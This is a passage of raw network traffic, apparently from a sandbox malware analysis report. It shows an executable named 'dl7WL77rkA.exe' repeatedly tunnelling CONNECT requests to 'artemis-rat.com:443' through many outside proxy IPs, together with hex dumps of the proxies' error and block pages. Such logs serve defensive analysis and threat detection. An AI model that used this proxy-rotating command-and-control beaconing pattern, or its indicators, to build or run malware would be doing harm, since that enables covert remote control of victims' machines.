                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 4d 6f 6e 2c 20 31 31 20 4d 61 72 20 32 30 32 34 20 30 32 3a 33 30 3a 34 30 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://artemis-rat.com/*">https://artemis-rat.com/*</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Mon, 11 Mar 2024 02:30:40 GMT</p></div></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            706192.168.2.551901103.118.44.6180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.367161036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            707192.168.2.552004174.77.111.198495473876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.374984026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            708192.168.2.549729138.2.73.15710803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.377542019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            709192.168.2.552092157.185.157.151265893876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.444804907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            710192.168.2.551447164.92.71.23232403876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.446592093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.498766899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.593036890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.702210903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            711192.168.2.552122172.93.213.177803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.447906017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.653239965 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.22.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            712192.168.2.55210438.162.11.6531283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.447906017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.861181974 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            713192.168.2.551251203.89.8.107803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.448698997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.490425110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.866493940 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.22.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            714192.168.2.55198537.221.197.165803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.449150085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.201855898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.201920986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.092787027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.702094078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            715192.168.2.549746154.65.39.8803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.449151993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.898794889 CET536INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:31 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                            Content-Length: 613
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.898833036 CET269INData Raw: 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f
                                                                                                                                                                                                                                                            Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.38 (Debian) Server at artemis-rat.com Port 443


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            716192.168.2.552152172.64.152.98803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.450603008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.606792927 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            717192.168.2.552137156.232.9.19480803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.462440968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.631088972 CET325INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.13.7
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 33 2e 37 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.13.7</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            718192.168.2.552002140.82.35.234444443876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.462440968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.840213060 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
